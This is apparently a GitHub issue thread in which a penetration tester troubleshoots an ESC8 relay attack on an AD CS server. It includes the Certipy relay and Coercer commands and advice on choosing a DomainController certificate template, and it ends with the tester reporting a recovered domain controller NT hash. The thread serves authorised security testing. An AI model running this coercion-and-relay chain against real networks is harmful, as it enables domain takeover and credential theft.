Help understanding "relay" issues? #99
Comments
Since you are coercing authentication from the machine account of a DC and not a regular machine, try adding the flag "-template DomainController" to the Certipy command. If that template is missing, try "-template KerberosAuthentication". As you can see from the output of Certipy, that defaults to the "Machine" template. Also note that you probably don't need to authenticate to the DC when coercing from it :)
Hello and thanks for the help! When I run with
If I do
Which templates are enabled on the ADCS server? Can you list them using Certipy? Unless of course you think that would be sensitive to share given that you are currently on a pentest.
Hello, yeah I think being this is my first time with ESC8 I might've been approaching this the wrong way. But to answer your question, when I do a
Then as I continue down through the Does that mean I should do
If you do not see the default templates "DomainController" or "KerberosAuthentication", they may not be published for some reason. Your client may have replaced the "DomainController" template with their own template named "DC". Yes, try using that instead.
@jsdhasfedssad you're an absolute champ, thank you. YES that was the case in that the DomainController template had been renamed. Once I got the name right the pfx got generated and DC NT hash came shortly after. Cheers!
Hello!
I'm on a pentest where Certipy has reported a host called "CA" is vulnerable to ESC8.
I set up Certipy in one window as follows:
certipy relay -ca ca.domain.com
In another window I did Coercer with:
coercer.py -u lowprivuser -p mypass -t IP.OF.A.DC -l MY.KALI.IP.ADDRESS
In the Certipy window I get:
It seems like this is the kind of behavior I'd expect to see if the config was vulnerable to ESC7.
Any help pointing me in the right direction to troubleshoot would be much appreciated!
Thanks,
Brian